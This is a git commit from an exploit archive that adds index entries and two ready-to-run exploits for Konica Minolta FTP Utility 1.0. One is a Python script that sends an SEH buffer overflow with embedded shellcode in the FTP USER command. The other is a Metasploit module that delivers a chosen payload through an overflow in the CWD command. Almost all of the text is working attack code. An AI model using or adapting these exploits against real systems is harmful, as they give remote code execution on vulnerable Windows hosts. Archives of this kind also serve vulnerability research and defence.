DB: 2015-09-22

2 new exploits
2015-09-22 05:03:00 +00:00 · 2015-09-22 05:03:00 +00:00 · 06333ebc0c
commit 06333ebc0c
parent c6421d54c9
3 changed files with 128 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34544,3 +34544,5 @@ id,file,description,date,author,platform,type,port
 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
+38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21
+38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,metasploit,windows,remote,21
--- a/platforms/windows/remote/38252.py
+++ b/platforms/windows/remote/38252.py
@ -0,0 +1,46 @@
+# Title: Konica Minolta FTP Utility - Remote Command Execution
+# Date : 20/09/2015
+# Author: R-73eN
+# Software: Konica Minolta FTP Utility v1.0
+# Tested: Windows XP SP3 
+# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
+# Every command is vulnerable to buffer overflow.
+
+import socket
+import struct
+
+shellcode =  ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
+shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
+shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
+shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
+shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
+shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
+shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
+shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
+shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
+shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
+shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
+shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
+shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
+shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
+shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
+shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
+shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
+shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
+banner = ""
+banner +="  ___        __        ____                 _    _  \n"  
+banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
+banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
+banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
+banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
+print banner
+nSEH = "\xEB\x13\x90\x90"
+SEH = struct.pack('<L',0x1220401E)
+evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+server = raw_input('Enter IP : ')
+s.connect((server, 21))
+a = s.recv(1024)
+print ' [+] ' + a
+s.send('User ' + evil )
+print '[+] https://www.infogen.al/ [+]'
--- a/platforms/windows/remote/38254.rb
+++ b/platforms/windows/remote/38254.rb
@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
+      'Description' => %q{
+          This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
+        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
+        leads to an SEH overflow.  Konica FTP allows anonymous access by default; valid
+        credentials are typically unnecessary to exploit this vulnerability.
+      },
+      'Author' =>
+        [
+          'Shankar Damodaran', # stack buffer overflow dos p.o.c
+          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          [ 'EBD', '37908' ]
+        ],
+      'Privileged' => false,
+      'Payload' =>
+        {
+          'Space' => 1500,
+          'BadChars' => "\x00\x0a\x2f\x5c",
+          'DisableNops' => true
+        },
+      'Platform' => 'win',
+      'Targets' =>
+        [
+          [
+            'Windows 7 SP1 x86',
+            {
+              'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
+              'Offset' => 1037
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Aug 23 2015',
+      'DefaultTarget' => 0))
+  end
+
+  def check
+    connect
+    disconnect
+
+    if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    connect_login
+
+    buf = rand_text(target['Offset'])
+    buf << generate_seh_record(target.ret)
+    buf << payload.encoded
+    buf << rand_text(3000)
+
+    print_status("Sending exploit buffer...")
+    send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
+
+    handler
+    disconnect
+  end
+end